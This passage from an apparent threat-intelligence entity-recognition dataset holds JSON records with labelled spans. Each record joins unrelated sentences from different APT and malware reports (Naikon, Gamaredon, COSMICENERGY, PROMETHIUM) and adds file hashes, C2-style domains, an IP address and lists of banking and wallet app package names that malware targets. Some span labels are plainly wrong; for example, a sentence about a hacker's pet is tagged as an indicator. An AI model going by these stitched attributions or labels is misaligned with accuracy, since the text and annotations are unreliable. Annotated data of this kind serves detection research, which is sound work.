The 2015 and 2016 Ukraine blackout events each featured several discrete disruptive events against the OT environment ( e.g. , disabling UPS systems , bricking serial - to - ethernet converters , conducting a DoS attack against a SIPROTEC relay , wiping OT systems , etc . ) .", "spans": [{"start": 38, "end": 50, "label": "Indicator"}, {"start": 51, "end": 63, "label": "Indicator"}, {"start": 64, "end": 76, "label": "Indicator"}, {"start": 77, "end": 91, "label": "Indicator"}, {"start": 92, "end": 105, "label": "Indicator"}, {"start": 106, "end": 118, "label": "Indicator"}, {"start": 124, "end": 188, "label": "Indicator"}, {"start": 189, "end": 253, "label": "Indicator"}, {"start": 258, "end": 267, "label": "Organization"}, {"start": 330, "end": 349, "label": "Organization"}, {"start": 354, "end": 386, "label": "Organization"}, {"start": 528, "end": 534, "label": "Organization"}, {"start": 537, "end": 601, "label": "Indicator"}]} {"text": "8f5d5d8419a4832d175a6028c9e7d445f1e99fdc12170db257df79831c69ae4e a5ebcdaf5fd10ec9de85d62e48cc97a4e08c699a7ebdeab0351b86ab1370557d 84578b9b2c3cc1c7bbfcf4038a6c76ae91dfc82eef5e4c6815627eaf6b4ae6f6 The oil and gas infrastructure nexus observed in connection with greensky27.vicp.net and other Unit 78020 ( Naikon ) infrastructure suggests targeting patterns supportive of the PRC 's strategic interests over energy resources within the South China Sea and Southeast Asia . Rancor : DB982B256843D8B6429AF24F766636BB0BF781B471922902D8DCF08D0C58511E . 
Then , it is called passing reused allocated memory and not a pointer to structure .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 199, "end": 210, "label": "Organization"}, {"start": 303, "end": 309, "label": "Organization"}, {"start": 405, "end": 421, "label": "Organization"}, {"start": 470, "end": 476, "label": "Organization"}, {"start": 479, "end": 543, "label": "Indicator"}]} {"text": "89eecd91dff4bf42bebbf3aa85aa512ddf661d3e9de4c91196c98f4fc325a018 9edee3f3d539e3ade61ac2956a6900d93ba3b535b6a76b3a9ee81e2251e25c61 0e48e5dbc3a60910c1460b382d28e087a580f38f57d3f82d4564309346069bd1 c113cdd2a5e164dcba157fc4e6026495a1cfbcb0b1a8bf3e38e7eddbb316e01f This Naikon report will be complemented by a follow-on report that will examine the Naikon TTP and the incredible volume of attack activity around the South China Sea that has been going on since at least 2010 . Rancor : CC081FFEA6F4769733AF9D0BAE0308CA0AE63667FA225E7965DF0884E96E2D2A . 
These observations leave open the possibility that COSMICENERGY was developed with malicious intent , and at a minimum that it can be used to support targeted threat activity in the wild .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 265, "end": 271, "label": "Organization"}, {"start": 344, "end": 350, "label": "Organization"}, {"start": 472, "end": 478, "label": "Organization"}, {"start": 481, "end": 545, "label": "Indicator"}, {"start": 599, "end": 611, "label": "Malware"}]} {"text": "1819d2546d9c9580193827c0d2f5aad7e7f2856f7d5e6d40fd739b6cecdb1e9e b213c1de737b72f8dd7185186a246277951b651c64812692da0b9fdf1be5bf15 453e7827e943cdda9121948f3f4a68d6289d09777538f92389ca56f6e6de03f0 0246dd4acd9f64ff1508131c57a7b29e995e102c74477d5624e1271700ecb0e2 The attackers appeared to be Chinese-speaking and targeted mainly top-level government agencies and civil and military organizations in countries such as the Philippines , Malaysia , Cambodia , Indonesia , Vietnam , Myanmar , Singapore , Nepal . Rancor : BC1C3E754BE9F2175B718ABA62174A550CDC3D98AB9C36671A58073140381659 . 
Although this wave did not use any zero day exploits , it relied on steganography and NTFS alternate data streams to complicate detection .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 264, "end": 273, "label": "Organization"}, {"start": 336, "end": 355, "label": "Organization"}, {"start": 360, "end": 392, "label": "Organization"}, {"start": 506, "end": 512, "label": "Organization"}, {"start": 515, "end": 579, "label": "Indicator"}]} {"text": "88034e0eddfdb6297670d28ed810aef87679e9492e9b3e782cc14d9d1a55db84 e08f08f4fa75609731c6dd597dc55c8f95dbdd5725a6a90a9f80134832a07f2e 01c5b637f283697350ca361f241416303ab6123da4c6726a6555ac36cb654b5c 1fb06666befd581019af509951320c7e8535e5b38ad058069f4979e9a21c7e1c This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent . Rancor : 83d1d181a6d583bca2f03c3c4e517757a766da5f4c1299fbbe514b3e2abd9e0d . 
Second , as COSMICENERGY was potentially developed as part of a red team , this discovery suggests that the barriers to entry are lowering for offensive OT threat activity since we normally observe these types of capabilities limited to well resourced or state sponsored actors .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 265, "end": 278, "label": "Malware"}, {"start": 328, "end": 341, "label": "Malware"}, {"start": 362, "end": 375, "label": "Vulnerability"}, {"start": 533, "end": 539, "label": "Organization"}, {"start": 542, "end": 606, "label": "Indicator"}, {"start": 621, "end": 633, "label": "Malware"}]} {"text": "6bdfb79f813448b7f1b4f4dbe6a45d1938f3039c93ecf80318cedd1090f7e341 ADDITIONAL INFORMATION Packages monitored pin.secret.access com.chase.sig.android com.morganstanley.clientmobile.prod com.wf.wellsfargomobile com.citi.citimobile com.konylabs.capitalone com.infonow.bofa com.htsu.hsbcpersonalbanking com.usaa.mobile.android.usaa In the Naikon scheme , a C&C server can be specialized XSControl software running on the host machine . Rancor : cswksfwq.kfesv.xyz . 
An adversary could potentially instruct a control systems device to perform an action that will cause an Impact", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 107, "end": 124, "label": "Indicator"}, {"start": 125, "end": 146, "label": "Indicator"}, {"start": 147, "end": 182, "label": "Indicator"}, {"start": 183, "end": 206, "label": "Indicator"}, {"start": 207, "end": 226, "label": "Indicator"}, {"start": 227, "end": 250, "label": "Indicator"}, {"start": 251, "end": 267, "label": "Indicator"}, {"start": 268, "end": 296, "label": "Indicator"}, {"start": 297, "end": 325, "label": "Indicator"}, {"start": 333, "end": 339, "label": "Organization"}, {"start": 351, "end": 361, "label": "System"}, {"start": 430, "end": 436, "label": "Organization"}, {"start": 439, "end": 457, "label": "Indicator"}, {"start": 460, "end": 571, "label": "Vulnerability"}]} {"text": "com.schwab.mobile com.americanexpress.android.acctsvcs.us com.pnc.ecommerce.mobile com.regions.mobbanking com.clairmail.fth com.grppl.android.shell.BOS com.tdbank com.huntington.m com.citizensbank.androidapp com.usbank.mobilebanking com.ally.MobileBanking com.key.android com.unionbank.ecommerce.mobile.android com.mfoundry.mb.android.mb_BMOH071025661 It was during operator X 's network monitoring that the attackers placed Naikon proxies within the countries ' borders , to cloak and support real-time outbound connections and data exfiltration from high-profile victim organizations . Rancor : Connect.bafunpda.xyz . 
The archive contained a RAR SFX which installed the malware and showed an empty PDF decoy .", "spans": [{"start": 0, "end": 17, "label": "Indicator"}, {"start": 58, "end": 82, "label": "Indicator"}, {"start": 83, "end": 105, "label": "Indicator"}, {"start": 106, "end": 123, "label": "Indicator"}, {"start": 124, "end": 151, "label": "Indicator"}, {"start": 152, "end": 162, "label": "Indicator"}, {"start": 163, "end": 179, "label": "Indicator"}, {"start": 180, "end": 207, "label": "Indicator"}, {"start": 208, "end": 232, "label": "Indicator"}, {"start": 233, "end": 255, "label": "Indicator"}, {"start": 256, "end": 271, "label": "Indicator"}, {"start": 272, "end": 310, "label": "Indicator"}, {"start": 311, "end": 351, "label": "Indicator"}, {"start": 408, "end": 417, "label": "Organization"}, {"start": 425, "end": 439, "label": "System"}, {"start": 588, "end": 594, "label": "Organization"}, {"start": 597, "end": 617, "label": "Indicator"}]} {"text": "com.bbt.cmol com.sovereign.santander com.mtb.mbanking.sc.retail.prod com.fi9293.godough com.commbank.netbank org.westpac.bank org.stgeorge.bank au.com.nab.mobile au.com.bankwest.mobile au.com.ingdirect.android org.banksa.bank com.anz.android com.anz.android.gomoney com.citibank.mobile.au org.bom.bank com.latuabancaperandroid In addition to stealing keystrokes , Naikon also intercepted network traffic . Rancor : 199.247.6.253 . Note : The default log rotation configuration on NetScaler allows 25 files per log type ( e.g. 
, ns.log ) and 100 Kilobytes per log , therefore recording 2.5 megabytes in total .", "spans": [{"start": 0, "end": 12, "label": "Indicator"}, {"start": 13, "end": 36, "label": "Indicator"}, {"start": 37, "end": 68, "label": "Indicator"}, {"start": 69, "end": 87, "label": "Indicator"}, {"start": 88, "end": 108, "label": "Indicator"}, {"start": 109, "end": 125, "label": "Indicator"}, {"start": 126, "end": 143, "label": "Indicator"}, {"start": 144, "end": 161, "label": "Indicator"}, {"start": 162, "end": 184, "label": "Indicator"}, {"start": 185, "end": 209, "label": "Indicator"}, {"start": 210, "end": 225, "label": "Indicator"}, {"start": 226, "end": 241, "label": "Indicator"}, {"start": 242, "end": 265, "label": "Indicator"}, {"start": 266, "end": 288, "label": "Indicator"}, {"start": 289, "end": 301, "label": "Indicator"}, {"start": 302, "end": 326, "label": "Indicator"}, {"start": 364, "end": 370, "label": "Organization"}, {"start": 406, "end": 412, "label": "Organization"}, {"start": 415, "end": 428, "label": "Indicator"}, {"start": 438, "end": 518, "label": "Indicator"}, {"start": 541, "end": 607, "label": "Indicator"}]} {"text": "com.comarch.mobile com.jpm.sig.android com.konylabs.cbplpat by.belinvestbank no.apps.dnbnor com.arkea.phonegap com.alseda.bpssberbank com.belveb.belvebmobile com.finanteq.finance.ca pl.eurobank pl.eurobank2 pl.noblebank.mobile com.getingroup.mobilebanking hr.asseco.android.mtoken.getin pl.getinleasing.mobile com.icp.ikasa.getinon Operator X also took advantage of cultural idiosyncrasies in its target countries , for example , the regular and widely accepted use of personal Gmail accounts for work . Cyberwarfare : A deep dive into the latest Gamaredon Espionage Campaign . 
The memory dump file can be processed offline by the threat actor to extract credentials .", "spans": [{"start": 0, "end": 18, "label": "Indicator"}, {"start": 19, "end": 38, "label": "Indicator"}, {"start": 39, "end": 59, "label": "Indicator"}, {"start": 60, "end": 76, "label": "Indicator"}, {"start": 77, "end": 91, "label": "Indicator"}, {"start": 92, "end": 110, "label": "Indicator"}, {"start": 111, "end": 133, "label": "Indicator"}, {"start": 134, "end": 157, "label": "Indicator"}, {"start": 158, "end": 181, "label": "Indicator"}, {"start": 182, "end": 193, "label": "Indicator"}, {"start": 194, "end": 206, "label": "Indicator"}, {"start": 207, "end": 226, "label": "Indicator"}, {"start": 227, "end": 255, "label": "Indicator"}, {"start": 256, "end": 286, "label": "Indicator"}, {"start": 287, "end": 309, "label": "Indicator"}, {"start": 310, "end": 331, "label": "Indicator"}, {"start": 547, "end": 556, "label": "Organization"}]} {"text": "eu.eleader.mobilebanking.pekao softax.pekao.powerpay softax.pekao.mpos dk.jyskebank.mobilbank com.starfinanz.smob.android.bwmobilbanking eu.newfrontier.iBanking.mobile.SOG.Retail com.accessbank.accessbankapp com.sbi.SBIFreedomPlus com.zenithBank.eazymoney net.cts.android.centralbank com.f1soft.nmbmobilebanking.activities.main com.lb.smartpay com.mbmobile In the spring of 2014 , we noticed an increase in the volume of attack activity by the Naikon APT . Gamaredon Group is a Cyber Espionage persistent operation attributed to Russians FSB ( Federal Security Service ) in a long-term military and geo-political confrontation against the Ukrainian government and more in general against the Ukrainian military power . 
Siamesekitten has been active since 2018 and has in the past targeted oil , gas , and telecom companies .", "spans": [{"start": 0, "end": 30, "label": "Indicator"}, {"start": 31, "end": 52, "label": "Indicator"}, {"start": 53, "end": 70, "label": "Indicator"}, {"start": 71, "end": 93, "label": "Indicator"}, {"start": 94, "end": 136, "label": "Indicator"}, {"start": 137, "end": 178, "label": "Indicator"}, {"start": 179, "end": 207, "label": "Indicator"}, {"start": 208, "end": 230, "label": "Indicator"}, {"start": 231, "end": 255, "label": "Indicator"}, {"start": 256, "end": 283, "label": "Indicator"}, {"start": 284, "end": 327, "label": "Indicator"}, {"start": 328, "end": 343, "label": "Indicator"}, {"start": 344, "end": 356, "label": "Indicator"}, {"start": 444, "end": 454, "label": "Organization"}, {"start": 457, "end": 466, "label": "Organization"}, {"start": 529, "end": 541, "label": "Organization"}, {"start": 544, "end": 568, "label": "Organization"}, {"start": 639, "end": 659, "label": "Organization"}, {"start": 719, "end": 732, "label": "Organization"}, {"start": 789, "end": 822, "label": "Organization"}]} {"text": "com.db.mobilebanking com.botw.mobilebanking com.fg.wallet com.sbi.SBISecure com.icsfs.safwa com.interswitchng.www com.dhanlaxmi.dhansmart.mtc com.icomvision.bsc.tbc hr.asseco.android.jimba.cecro com.vanso.gtbankapp com.fss.pnbpsp com.mfino.sterling cy.com.netinfo.netteller.boc ge.mobility.basisbank com.snapwork.IDBI In particular , we noticed that the Naikon group was spear-phished by an actor we now call \" Hellsing \" . Gamaredon has been active since 2014 , and during this time , the modus operandi has remained almost the same . 
The lure contains a payment instruction form containing VBA code , which appears to have been sent from the State Treasury Service of Ukraine .", "spans": [{"start": 0, "end": 20, "label": "Indicator"}, {"start": 21, "end": 43, "label": "Indicator"}, {"start": 44, "end": 57, "label": "Indicator"}, {"start": 58, "end": 75, "label": "Indicator"}, {"start": 76, "end": 91, "label": "Indicator"}, {"start": 92, "end": 113, "label": "Indicator"}, {"start": 114, "end": 141, "label": "Indicator"}, {"start": 142, "end": 164, "label": "Indicator"}, {"start": 165, "end": 194, "label": "Indicator"}, {"start": 195, "end": 214, "label": "Indicator"}, {"start": 215, "end": 229, "label": "Indicator"}, {"start": 230, "end": 248, "label": "Indicator"}, {"start": 249, "end": 277, "label": "Indicator"}, {"start": 278, "end": 299, "label": "Indicator"}, {"start": 300, "end": 317, "label": "Indicator"}, {"start": 354, "end": 366, "label": "Organization"}, {"start": 391, "end": 396, "label": "Organization"}, {"start": 411, "end": 419, "label": "Organization"}, {"start": 424, "end": 433, "label": "Organization"}, {"start": 640, "end": 677, "label": "Organization"}]} {"text": "com.lcode.apgvb com.fact.jib mn.egolomt.bank com.pnbrewardz com.firstbank.firstmobile wit.android.bcpBankingApp.millenniumPL com.grppl.android.shell.halifax com.revolut.revolut de.commerzbanking.mobil uk.co.santander.santanderUK se.nordea.mobilebank com.snapwork.hdfc com.csam.icici.bank.imobile com.msf.kbank.mobile More details about the cloak and dagger games between Naikon and Hellsing can be found in our blogpost : \" The Chronicles of the Hellsing APT : The Empire Strikes Back \" . The most used malware implant is dubbed Pteranodon or Pterodo and consists of a multistage backdoor designed to collect sensitive information or maintaining access on compromised machines . 
Talos researchers recently discovered multiple vulnerabilities in Open Babel , an open - source software library used in a variety of chemistry and research settings .", "spans": [{"start": 0, "end": 15, "label": "Indicator"}, {"start": 16, "end": 28, "label": "Indicator"}, {"start": 29, "end": 44, "label": "Indicator"}, {"start": 45, "end": 59, "label": "Indicator"}, {"start": 60, "end": 85, "label": "Indicator"}, {"start": 86, "end": 124, "label": "Indicator"}, {"start": 125, "end": 156, "label": "Indicator"}, {"start": 157, "end": 176, "label": "Indicator"}, {"start": 177, "end": 200, "label": "Indicator"}, {"start": 201, "end": 228, "label": "Indicator"}, {"start": 229, "end": 249, "label": "Indicator"}, {"start": 250, "end": 267, "label": "Indicator"}, {"start": 268, "end": 295, "label": "Indicator"}, {"start": 296, "end": 316, "label": "Indicator"}, {"start": 371, "end": 377, "label": "Organization"}, {"start": 382, "end": 390, "label": "Organization"}, {"start": 446, "end": 458, "label": "Organization"}, {"start": 465, "end": 484, "label": "System"}, {"start": 529, "end": 539, "label": "Malware"}, {"start": 543, "end": 550, "label": "Malware"}, {"start": 580, "end": 588, "label": "Malware"}, {"start": 679, "end": 696, "label": "Organization"}, {"start": 745, "end": 755, "label": "System"}]} {"text": "com.bmm.mobilebankingapp net.bnpparibas.mescomptes fr.banquepopulaire.cyberplus com.caisseepargne.android.mobilebanking com.palatine.android.mobilebanking.prod com.ocito.cdn.activity.creditdunord com.fullsix.android.labanquepostale.accountaccess mobi.societegenerale.mobile.lappli com.db.businessline.cardapp com.skh.android.mbanking com.ifs.banking.fiid1491 Truvasys has been involved in several attack campaigns , where it has masqueraded as one of server common computer utilities , including WinUtils , TrueCrypt , WinRAR , or SanDisk . 
It is distributed in a spear phishing campaign with a weaponized of\ufb01ce document that appears to be designed to lure military personnel . The injected code calls out a first domain ( seen above encoded in Base64 ) and generates a Base64 response : Decoding it reveals a URL pointing to the actual skimming code , which is heavily obfuscated ( likely via obfuscator.io ): The data exfiltration is also done differently as seen in the image below .", "spans": [{"start": 0, "end": 24, "label": "Indicator"}, {"start": 25, "end": 50, "label": "Indicator"}, {"start": 51, "end": 79, "label": "Indicator"}, {"start": 80, "end": 119, "label": "Indicator"}, {"start": 120, "end": 159, "label": "Indicator"}, {"start": 160, "end": 195, "label": "Indicator"}, {"start": 196, "end": 245, "label": "Indicator"}, {"start": 246, "end": 280, "label": "Indicator"}, {"start": 281, "end": 308, "label": "Indicator"}, {"start": 309, "end": 333, "label": "Indicator"}, {"start": 334, "end": 358, "label": "Indicator"}, {"start": 359, "end": 367, "label": "System"}, {"start": 465, "end": 483, "label": "Organization"}, {"start": 496, "end": 504, "label": "Organization"}, {"start": 507, "end": 516, "label": "Organization"}, {"start": 519, "end": 525, "label": "Organization"}, {"start": 531, "end": 538, "label": "Organization"}, {"start": 606, "end": 611, "label": "System"}, {"start": 788, "end": 880, "label": "Indicator"}, {"start": 894, "end": 907, "label": "System"}]} {"text": "de.dkb.portalapp pl.pkobp.ipkobiznes pl.com.suntech.mobileconnect eu.eleader.mobilebanking.pekao.firm pl.mbank pl.upaid.nfcwallet.mbank eu.eleader.mobilebanking.bre pl.asseco.mpromak.android.app.bre pl.asseco.mpromak.android.app.bre.hd pl.mbank.mnews eu.eleader.mobilebanking.raiffeisen pl.raiffeisen.nfc hr.asseco.android.jimba.rmb PROMETHIUM is an activity group that has been active as early as 2012 . 
In the recent months , Ukrainian CERT ( CERT-UA ) reported an intensi\ufb01cation of Gamaredon B-ACT S-APT Cyberattacks against military targets . The Aclip backdoor uses the Slack API to send system data , files , and screenshots to the C2 while receiving PowerShell commands at the same time .", "spans": [{"start": 0, "end": 16, "label": "Indicator"}, {"start": 17, "end": 36, "label": "Indicator"}, {"start": 37, "end": 65, "label": "Indicator"}, {"start": 66, "end": 101, "label": "Indicator"}, {"start": 102, "end": 110, "label": "Indicator"}, {"start": 111, "end": 135, "label": "Indicator"}, {"start": 136, "end": 164, "label": "Indicator"}, {"start": 165, "end": 198, "label": "Indicator"}, {"start": 199, "end": 235, "label": "Indicator"}, {"start": 236, "end": 250, "label": "Indicator"}, {"start": 251, "end": 286, "label": "Indicator"}, {"start": 287, "end": 304, "label": "Indicator"}, {"start": 305, "end": 332, "label": "Indicator"}, {"start": 333, "end": 343, "label": "Organization"}, {"start": 350, "end": 364, "label": "Organization"}, {"start": 428, "end": 442, "label": "Organization"}, {"start": 445, "end": 452, "label": "Organization"}, {"start": 551, "end": 565, "label": "Malware"}, {"start": 575, "end": 584, "label": "System"}]} {"text": "com.advantage.RaiffeisenBank pl.bzwbk.ibiznes24 pl.bzwbk.bzwbk24 pl.bzwbk.mobile.tab.bzwbk24 com.comarch.mobile.investment com.android.vending com.snapchat.android jp.naver.line.android com.viber.voip com.gettaxi.android com.whatsapp com.tencent.mm com.skype.raider com.ubercab com.paypal.android.p2pmobile The group primarily uses Truvasys , a first-stage malware that has been in circulation for several years . The new wave dates back to the end of November 2019 and was \ufb01rst analyzed by Vitali Kremez . 
The contents found in secure[.]66[.]to often lead to zhu[.]vn , which is Hack520 \u2019s domain for hosting his own private blog .", "spans": [{"start": 0, "end": 28, "label": "Indicator"}, {"start": 29, "end": 47, "label": "Indicator"}, {"start": 48, "end": 64, "label": "Indicator"}, {"start": 65, "end": 92, "label": "Indicator"}, {"start": 93, "end": 122, "label": "Indicator"}, {"start": 123, "end": 142, "label": "Indicator"}, {"start": 143, "end": 163, "label": "Indicator"}, {"start": 164, "end": 185, "label": "Indicator"}, {"start": 186, "end": 200, "label": "Indicator"}, {"start": 201, "end": 220, "label": "Indicator"}, {"start": 221, "end": 233, "label": "Indicator"}, {"start": 234, "end": 248, "label": "Indicator"}, {"start": 249, "end": 265, "label": "Indicator"}, {"start": 266, "end": 277, "label": "Indicator"}, {"start": 278, "end": 306, "label": "Indicator"}, {"start": 311, "end": 316, "label": "Organization"}, {"start": 332, "end": 340, "label": "System"}, {"start": 529, "end": 545, "label": "Indicator"}, {"start": 560, "end": 568, "label": "Indicator"}, {"start": 580, "end": 597, "label": "Organization"}]} {"text": "com.circle.android com.coinbase.android com.walmart.android com.bestbuy.android com.ebay.gumtree.au com.ebay.mobile com.westernunion.android.mtapp com.moneybookers.skrillpayments com.gyft.android com.amazon.mShop.android.shopping com.comarch.mobile.banking.bgzbnpparibas.biznes pl.bnpbgzparibas.firmapp com.finanteq.finance.bgz pl.upaid.bgzbnpp NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird . Starting from those \ufb01ndings , Cybaze-Yoroi ZLab team decided to deep dive into a technical analysis of the latest Pterodo implant . 
In addition , Hack520 \u2019s tweets always show photos of the same animal , which is likely his pet pig .", "spans": [{"start": 0, "end": 18, "label": "Indicator"}, {"start": 19, "end": 39, "label": "Indicator"}, {"start": 40, "end": 59, "label": "Indicator"}, {"start": 60, "end": 79, "label": "Indicator"}, {"start": 80, "end": 99, "label": "Indicator"}, {"start": 100, "end": 115, "label": "Indicator"}, {"start": 116, "end": 146, "label": "Indicator"}, {"start": 147, "end": 178, "label": "Indicator"}, {"start": 179, "end": 195, "label": "Indicator"}, {"start": 196, "end": 229, "label": "Indicator"}, {"start": 230, "end": 277, "label": "Indicator"}, {"start": 278, "end": 302, "label": "Indicator"}, {"start": 303, "end": 327, "label": "Indicator"}, {"start": 328, "end": 344, "label": "Indicator"}, {"start": 345, "end": 354, "label": "Organization"}, {"start": 361, "end": 375, "label": "Organization"}, {"start": 428, "end": 437, "label": "Organization"}, {"start": 441, "end": 449, "label": "System"}, {"start": 482, "end": 504, "label": "Organization"}, {"start": 566, "end": 573, "label": "Malware"}, {"start": 598, "end": 685, "label": "Indicator"}]} {"text": "de.postbank.finanzassistent pl.bph de.comdirect.android com.starfinanz.smob.android.sfinanzstatus de.sdvrz.ihb.mobile.app pl.ing.mojeing com.ing.mobile pl.ing.ingksiegowosc com.comarch.security.mobilebanking com.comarch.mobile.investment.ing com.ingcb.mobile.cbportal de.buhl.finanzblick pl.pkobp.iko pl.ipko.mobile pl.inteligo.mobile de.number26.android PROMETHIUM and NEODYMIUM both used an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player that , at the time , was both unknown and unpatched . The complex infection chain begins with a weaponized Of\ufb01ce document named \u201c f.doc \u201d . 
Schools , colleges , and universities must somehow reconcile tight budgets with the need to deploy a sophisticated enough detection and response capability to find and evict stealthy adversaries like Vice Society .", "spans": [{"start": 0, "end": 27, "label": "Indicator"}, {"start": 28, "end": 34, "label": "Indicator"}, {"start": 35, "end": 55, "label": "Indicator"}, {"start": 56, "end": 97, "label": "Indicator"}, {"start": 98, "end": 121, "label": "Indicator"}, {"start": 122, "end": 136, "label": "Indicator"}, {"start": 137, "end": 151, "label": "Indicator"}, {"start": 152, "end": 172, "label": "Indicator"}, {"start": 173, "end": 207, "label": "Indicator"}, {"start": 208, "end": 241, "label": "Indicator"}, {"start": 242, "end": 267, "label": "Indicator"}, {"start": 268, "end": 287, "label": "Indicator"}, {"start": 288, "end": 300, "label": "Indicator"}, {"start": 301, "end": 315, "label": "Indicator"}, {"start": 316, "end": 334, "label": "Indicator"}, {"start": 335, "end": 354, "label": "Indicator"}, {"start": 355, "end": 365, "label": "Organization"}, {"start": 370, "end": 379, "label": "Organization"}, {"start": 405, "end": 418, "label": "Vulnerability"}, {"start": 566, "end": 571, "label": "System"}, {"start": 589, "end": 594, "label": "Indicator"}, {"start": 599, "end": 606, "label": "Organization"}, {"start": 609, "end": 617, "label": "Organization"}, {"start": 624, "end": 636, "label": "Organization"}, {"start": 799, "end": 811, "label": "Organization"}]} {"text": "pl.millennium.corpApp eu.transfer24.app pl.aliorbank.aib pl.corelogic.mtoken alior.bankingapp.android com.ferratumbank.mobilebank com.swmind.vcc.android.bzwbk_mobile.app de.schildbach.wallet piuk.blockchain.android com.bitcoin.mwallet com.btcontract.wallet com.bitpay.wallet com.bitpay.copay btc.org.freewallet.app org.electrum.electrum Data about Wingbird activity indicate that it is typically used to attack individual computers instead of networks . 
Hash : 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a That piece explored how Biderman \u2014 who is Jewish \u2014 had become the target of concerted harassment campaigns by anti - Semitic and far - right groups online in the months leading up to the hack .", "spans": [{"start": 57, "end": 76, "label": "Indicator"}, {"start": 77, "end": 101, "label": "Indicator"}, {"start": 102, "end": 129, "label": "Indicator"}, {"start": 130, "end": 169, "label": "Indicator"}, {"start": 170, "end": 190, "label": "Indicator"}, {"start": 191, "end": 214, "label": "Indicator"}, {"start": 215, "end": 234, "label": "Indicator"}, {"start": 235, "end": 256, "label": "Indicator"}, {"start": 257, "end": 274, "label": "Indicator"}, {"start": 275, "end": 291, "label": "Indicator"}, {"start": 292, "end": 314, "label": "Indicator"}, {"start": 315, "end": 336, "label": "Indicator"}, {"start": 461, "end": 525, "label": "Indicator"}, {"start": 550, "end": 558, "label": "Organization"}, {"start": 636, "end": 673, "label": "Organization"}]} {"text": "com.xapo com.airbitz com.kibou.bitcoin com.qcan.mobile.bitcoin.wallet me.cryptopay.android com.bitcoin.wallet lt.spectrofinance.spectrocoin.android.wallet com.kryptokit.jaxx com.wirex bcn.org.freewallet.app com.hashengineering.bitcoincash.wallet bcc.org.freewallet.app com.coinspace.app btg.org.freewallet.app net.bither In early May 2016 , both PROMETHIUM and NEODYMIUM started conducting attack campaigns against specific individuals in Europe . Threat : Gamaredon Pteranodon weaponized document . 
The threat actor cleared Windows Event Logs on affected backend Exchange servers so further information was not available regarding the PowerShell commands leveraged by the threat actors .", "spans": [{"start": 0, "end": 8, "label": "Indicator"}, {"start": 9, "end": 20, "label": "Indicator"}, {"start": 21, "end": 38, "label": "Indicator"}, {"start": 39, "end": 69, "label": "Indicator"}, {"start": 70, "end": 90, "label": "Indicator"}, {"start": 91, "end": 109, "label": "Indicator"}, {"start": 110, "end": 154, "label": "Indicator"}, {"start": 155, "end": 173, "label": "Indicator"}, {"start": 174, "end": 183, "label": "Indicator"}, {"start": 184, "end": 206, "label": "Indicator"}, {"start": 207, "end": 245, "label": "Indicator"}, {"start": 246, "end": 268, "label": "Indicator"}, {"start": 269, "end": 286, "label": "Indicator"}, {"start": 287, "end": 309, "label": "Indicator"}, {"start": 310, "end": 320, "label": "Indicator"}, {"start": 346, "end": 356, "label": "Organization"}, {"start": 361, "end": 370, "label": "Organization"}, {"start": 415, "end": 435, "label": "Organization"}, {"start": 457, "end": 466, "label": "Organization"}, {"start": 467, "end": 477, "label": "Malware"}, {"start": 504, "end": 516, "label": "Organization"}, {"start": 673, "end": 686, "label": "Organization"}]} {"text": "co.edgesecure.app com.arcbit.arcbit distributedlab.wallet de.schildbach.wallet_test com.aegiswallet com.plutus.wallet com.coincorner.app.crypt eth.org.freewallet.app secret.access secret.pattern RuMMS : The Latest Family of Android Malware Attacking Users in Russia Via SMS Phishing April 26 , 2016 Introduction Recently we observed an Android malware family being used to attack users in Russia . Meanwhile , NEODYMIUM used well-tailored spear-phishing emails with attachments that delivered the exploit code , ultimately leading to Wingbird 's installation on victim computers . Brief Description : Doc \ufb01le weaponized with Exploit . 
Although Mandiant has no data on the objectives of this threat actor , their broad targeting across industries and geographies is consistent with a targeting calculus most commonly seen among financially motivated groups .", "spans": [{"start": 0, "end": 17, "label": "Indicator"}, {"start": 18, "end": 35, "label": "Indicator"}, {"start": 36, "end": 57, "label": "Indicator"}, {"start": 58, "end": 83, "label": "Indicator"}, {"start": 84, "end": 99, "label": "Indicator"}, {"start": 100, "end": 117, "label": "Indicator"}, {"start": 118, "end": 142, "label": "Indicator"}, {"start": 143, "end": 165, "label": "Indicator"}, {"start": 166, "end": 179, "label": "Indicator"}, {"start": 180, "end": 194, "label": "Indicator"}, {"start": 195, "end": 200, "label": "Malware"}, {"start": 224, "end": 231, "label": "System"}, {"start": 336, "end": 343, "label": "Malware"}, {"start": 410, "end": 419, "label": "Organization"}, {"start": 534, "end": 542, "label": "System"}, {"start": 644, "end": 652, "label": "Organization"}]} {"text": "The malware samples were mainly distributed through a series of malicious subdomains registered under a legitimate domain belonging to a well-known shared hosting service provider in Russia . PROMETHIUM and NEODYMIUM both used a zero-day exploit that executed code to download a malicious payload . Ssdeep : 768:u0foGtYZKQ5QZJQ6hKVsEEIHNDxpy3TI3dU4DKfLX9Eir : uG1aKQ5OwCrItq3TgGfLt9r . It now appears those attacks were perpetrated by Harrison , who sent emails from different accounts at the free email service Vistomail pretending to be Bradshaw , his then - girlfriend and their friends .", "spans": [{"start": 192, "end": 202, "label": "Organization"}, {"start": 207, "end": 216, "label": "Organization"}, {"start": 229, "end": 245, "label": "Vulnerability"}, {"start": 299, "end": 305, "label": "System"}, {"start": 435, "end": 443, "label": "Organization"}]} {"text": "Because all the URLs used in this campaign have the form of hxxp : //yyyyyyyy [ . 
